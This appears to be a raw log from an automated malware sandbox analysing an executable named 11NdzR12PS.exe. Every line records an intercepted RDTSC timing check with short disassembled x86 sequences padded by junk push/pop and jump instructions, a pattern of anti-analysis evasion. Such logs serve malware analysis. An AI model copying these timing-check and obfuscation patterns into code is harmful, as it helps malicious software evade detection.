Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF93AC second address: FF93D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007FF3408102FCh 0x00000012 jno 00007FF3408102FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF93D3 second address: FF93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFF333 second address: FFF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFEF28 second address: FFEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 1009598 second address: 100959D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100959D second address: 10095C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 push ecx 0x00000008 jng 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E707 second address: 100E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E70B second address: 100E711 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E711 second address: 100E758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF340810309h 0x0000000b js 00007FF340810332h 0x00000011 push esi 0x00000012 jmp 00007FF340810302h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3408102FAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E758 second address: 100E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 1010C5A second address: 1010C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 10229B4 second address: 10229B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 10229B8 second address: 10229CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF3408102F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC90 second address: 103BC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC94 second address: 103BC9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC9E second address: 103BCD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF34080AB11h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007FF34080AB0Dh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AE32 second address: 103AE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AE3A second address: 103AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AFA7 second address: 103AFC1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF340810305h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B396 second address: 103B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB11h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnp 00007FF34080AB06h 0x00000011 jmp 00007FF34080AB19h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B525 second address: 103B538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jne 00007FF3408102F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B538 second address: 103B553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B553 second address: 103B55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B55F second address: 103B56F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FF34080AB0Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B817 second address: 103B81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B81F second address: 103B823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B823 second address: 103B829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B829 second address: 103B852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF34080AB11h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF34080AB0Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B852 second address: 103B857 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B857 second address: 103B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FF34080AB06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9B9 second address: 103B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF3408102F6h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9CE second address: 103B9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9DC second address: 103B9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FF3408102F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9EA second address: 103B9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D479 second address: 103D47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D47D second address: 103D48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D48C second address: 103D4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF340810300h 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007FF3408102F6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 104393C second address: 104396B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB17h 0x00000009 jno 00007FF34080AB06h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FF34080AB06h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 104396B second address: 10439A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF34081030Ch 0x0000000f jmp 00007FF340810306h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DC2 second address: 56F0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DCD second address: 56F0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esp 0x00000006 jmp 00007FF3408102FCh 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DE8 second address: 56F0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DEC second address: 56F0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DF0 second address: 56F0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DF6 second address: 56F0E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF3408102FEh 0x00000011 movzx ecx, di 0x00000014 pop ebx 0x00000015 push ecx 0x00000016 mov ebx, 3467B66Eh 0x0000001b pop edi 0x0000001c popad 0x0000001d pop ebp 0x0000001e pushad 0x0000001f movzx ecx, bx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ah, dl 0x00000026 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 574007D second address: 5740083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5740083 second address: 57400C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810300h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF340810307h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D00F1 second address: 56D0115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0115 second address: 56D0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF3408102FEh 0x00000018 sub si, E138h 0x0000001d jmp 00007FF3408102FBh 0x00000022 popfd 0x00000023 mov bh, cl 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF3408102FEh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0174 second address: 56D01BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF34080AB17h 0x0000000b sub cx, FC5Eh 0x00000010 jmp 00007FF34080AB19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01BC second address: 56D01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01C0 second address: 56D01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01C6 second address: 56D01CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01CC second address: 56D01D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0705 second address: 56F0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810308h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0721 second address: 56F0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF34080AB0Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB17h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0752 second address: 56F0758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0758 second address: 56F075C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F075C second address: 56F076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F076C second address: 56F0770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0770 second address: 56F0776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0776 second address: 56F077F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E9E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F03CE second address: 56F0438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF3408102FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007FF3408102FDh 0x0000001a and ch, FFFFFFD6h 0x0000001d jmp 00007FF340810301h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF340810308h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0438 second address: 56F043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F043C second address: 56F0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0442 second address: 56F046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700163 second address: 57001AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, DCh 0x0000000d pushfd 0x0000000e jmp 00007FF340810301h 0x00000013 sub ecx, 0497E776h 0x00000019 jmp 00007FF340810301h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, 3B3C9675h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57001AB second address: 57001BA instructions: 0x00000000 rdtsc 0x00000002 mov cx, 24F1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57001BA second address: 57001BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730EF2 second address: 5730F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB17h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F20 second address: 5730F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F44 second address: 5730F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F48 second address: 5730F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F62 second address: 5730F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F74 second address: 5730F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F78 second address: 5730F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710280 second address: 5710284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710284 second address: 57102A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102A1 second address: 57102B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102B1 second address: 57102B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102B5 second address: 57102D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF3408102FEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102D3 second address: 57102D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102D9 second address: 57102DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102DF second address: 57102E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102E3 second address: 5710302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop ecx 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710302 second address: 5710329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF34080AB0Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710329 second address: 571032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571032D second address: 5710333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710333 second address: 5710344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
